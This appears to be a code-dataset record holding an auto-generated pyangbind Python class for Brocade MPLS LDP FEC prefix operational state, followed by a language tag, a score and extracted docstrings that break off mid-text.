self.__prefix = YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_key(self):
"""
Getter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container)
"""
return self.__key
def _set_key(self, v, load=False):
"""
Setter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_key is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_key() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """key must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__key = t
if hasattr(self, '_set'):
self._set()
def _unset_key(self):
self.__key = YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
tot_no_of_prefix_fec = __builtin__.property(_get_tot_no_of_prefix_fec)
tot_no_of_prefix_fec_installed = __builtin__.property(_get_tot_no_of_prefix_fec_installed)
tot_no_of_prefix_fec_filtered = __builtin__.property(_get_tot_no_of_prefix_fec_filtered)
tot_no_of_prefix_fec_lwd = __builtin__.property(_get_tot_no_of_prefix_fec_lwd)
filtered = __builtin__.property(_get_filtered)
prefix_filtered = __builtin__.property(_get_prefix_filtered)
prefix = __builtin__.property(_get_prefix)
key = __builtin__.property(_get_key)
_pyangbind_elements = {'tot_no_of_prefix_fec': tot_no_of_prefix_fec, 'tot_no_of_prefix_fec_installed': tot_no_of_prefix_fec_installed, 'tot_no_of_prefix_fec_filtered': tot_no_of_prefix_fec_filtered, 'tot_no_of_prefix_fec_lwd': tot_no_of_prefix_fec_lwd, 'filtered': filtered, 'prefix_filtered': prefix_filtered, 'prefix': prefix, 'key': key, }
| <filename>pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py<gh_stars>0
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import prefix
import key
class ldp_fec_prefixes(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/fec/ldp-fec-prefixes. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description:
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__tot_no_of_prefix_fec','__tot_no_of_prefix_fec_installed','__tot_no_of_prefix_fec_filtered','__tot_no_of_prefix_fec_lwd','__filtered','__prefix_filtered','__prefix','__key',)
_yang_name = 'ldp-fec-prefixes'
_rest_name = 'ldp-fec-prefixes'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__prefix_filtered = YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__tot_no_of_prefix_fec_installed = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__tot_no_of_prefix_fec = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__prefix = YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__tot_no_of_prefix_fec_lwd = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__key = YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
self.__tot_no_of_prefix_fec_filtered = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'ldp', u'fec', u'ldp-fec-prefixes']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'ldp', u'fec', u'ldp-fec-prefixes']
def _get_tot_no_of_prefix_fec(self):
"""
Getter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32)
YANG Description: tot_no_of_prefix_fec
"""
return self.__tot_no_of_prefix_fec
def _set_tot_no_of_prefix_fec(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec() directly.
YANG Description: tot_no_of_prefix_fec
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec(self):
self.__tot_no_of_prefix_fec = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_installed(self):
"""
Getter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32)
YANG Description: tot_no_of_prefix_fec_installed
"""
return self.__tot_no_of_prefix_fec_installed
def _set_tot_no_of_prefix_fec_installed(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_installed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_installed() directly.
YANG Description: tot_no_of_prefix_fec_installed
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_installed must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_installed = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_installed(self):
self.__tot_no_of_prefix_fec_installed = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_filtered(self):
"""
Getter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32)
YANG Description: tot_no_of_prefix_fec_filtered
"""
return self.__tot_no_of_prefix_fec_filtered
def _set_tot_no_of_prefix_fec_filtered(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_filtered() directly.
YANG Description: tot_no_of_prefix_fec_filtered
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_filtered must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_filtered(self):
self.__tot_no_of_prefix_fec_filtered = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_lwd(self):
"""
Getter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32)
YANG Description: tot_no_of_prefix_fec_lwd
"""
return self.__tot_no_of_prefix_fec_lwd
def _set_tot_no_of_prefix_fec_lwd(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_lwd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_lwd() directly.
YANG Description: tot_no_of_prefix_fec_lwd
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_lwd must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_lwd = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_lwd(self):
self.__tot_no_of_prefix_fec_lwd = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_filtered(self):
"""
Getter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type)
YANG Description: Filter Type
"""
return self.__filtered
def _set_filtered(self, v, load=False):
"""
Setter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filtered() directly.
YANG Description: Filter Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filtered must be of a type compatible with fec-filter-type""",
'defined-type': "brocade-mpls-operational:fec-filter-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)""",
})
self.__filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_filtered(self):
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
def _get_prefix_filtered(self):
"""
Getter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string)
YANG Description: filter name
"""
return self.__prefix_filtered
def _set_prefix_filtered(self, v, load=False):
"""
Setter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix_filtered() directly.
YANG Description: filter name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix_filtered must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__prefix_filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix_filtered(self):
self.__prefix_filtered = YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_prefix(self):
"""
Getter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list)
"""
return self.__prefix
def _set_prefix(self, v, load=False):
"""
Setter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix(self):
self.__prefix = YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_key(self):
"""
Getter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container)
"""
return self.__key
def _set_key(self, v, load=False):
"""
Setter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_key is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_key() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """key must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__key = t
if hasattr(self, '_set'):
self._set()
def _unset_key(self):
self.__key = YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
tot_no_of_prefix_fec = __builtin__.property(_get_tot_no_of_prefix_fec)
tot_no_of_prefix_fec_installed = __builtin__.property(_get_tot_no_of_prefix_fec_installed)
tot_no_of_prefix_fec_filtered = __builtin__.property(_get_tot_no_of_prefix_fec_filtered)
tot_no_of_prefix_fec_lwd = __builtin__.property(_get_tot_no_of_prefix_fec_lwd)
filtered = __builtin__.property(_get_filtered)
prefix_filtered = __builtin__.property(_get_prefix_filtered)
prefix = __builtin__.property(_get_prefix)
key = __builtin__.property(_get_key)
_pyangbind_elements = {'tot_no_of_prefix_fec': tot_no_of_prefix_fec, 'tot_no_of_prefix_fec_installed': tot_no_of_prefix_fec_installed, 'tot_no_of_prefix_fec_filtered': tot_no_of_prefix_fec_filtered, 'tot_no_of_prefix_fec_lwd': tot_no_of_prefix_fec_lwd, 'filtered': filtered, 'prefix_filtered': prefix_filtered, 'prefix': prefix, 'key': key, }
| en | 0.502833 | This class was auto-generated by the PythonClass plugin for PYANG from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/fec/ldp-fec-prefixes. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Getter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32) YANG Description: tot_no_of_prefix_fec Setter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_tot_no_of_prefix_fec is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_tot_no_of_prefix_fec() directly. YANG Description: tot_no_of_prefix_fec tot_no_of_prefix_fec must be of a type compatible with uint32 YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False) Getter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32) YANG Description: tot_no_of_prefix_fec_installed Setter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_tot_no_of_prefix_fec_installed is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_tot_no_of_prefix_fec_installed() directly. YANG Description: tot_no_of_prefix_fec_installed tot_no_of_prefix_fec_installed must be of a type compatible with uint32 YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': 